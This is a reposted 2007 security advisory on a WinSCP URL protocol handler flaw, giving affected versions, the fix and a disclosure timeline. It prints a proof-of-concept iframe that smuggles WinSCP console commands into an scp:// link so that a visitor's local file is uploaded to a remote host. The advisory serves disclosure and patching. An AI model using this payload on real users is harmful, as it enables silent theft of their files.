Search This Blog

Sunday, September 16, 2007

[NT] WinSCP URL Protocol Handler Flaw

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

WinSCP URL Protocol Handler Flaw
------------------------------------------------------------------------


SUMMARY

By default WinSCP installs URL protocol handlers for the scp:// and
sftp:// protocols. These could be used by malicious web content to
automatically upload any file from the local system to a remote server, or
automatically download files from a remote server to the local system.

Since version 3.8.2 there is a sort of protection against this, but this
does not stop all forms of attack.

DETAILS

Vulnerable Systems:
* WinSCP version 4.0.3

Immune Systems:
* WinSCP version 4.0.4

On a machine you control set up an scp-only account with the username
"scp" with any password. Place this on a website: <iframe
src='scp:password@yourhost.com:" /console /command "option confirm off"
"put c:\boot.ini" close exit "'/>

This will upload a file to the server when the page is visited by a user
with a vulnerable WinSCP installed.

Downloading a file from the server to any location writable by the current
user also works.

Solution:
Upgrade to version 4.04 or higher from <http://winscp.net/download.php>

http://winscp.net/download.php

Disclosure Timeline
24-Jul-2007 Vulnerability reported to Martin Prikryl
25-07-2007 Proposed fix to Martin
31-07-2007 Response from Martin
01-09-2007 Martin confirms fix
02-09-2007 New version done
06-09-2007 WinSCP v4.04 released


ADDITIONAL INFORMATION

The information has been provided by <mailto:Kender.Security@gmail.com>
Kender.Security.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)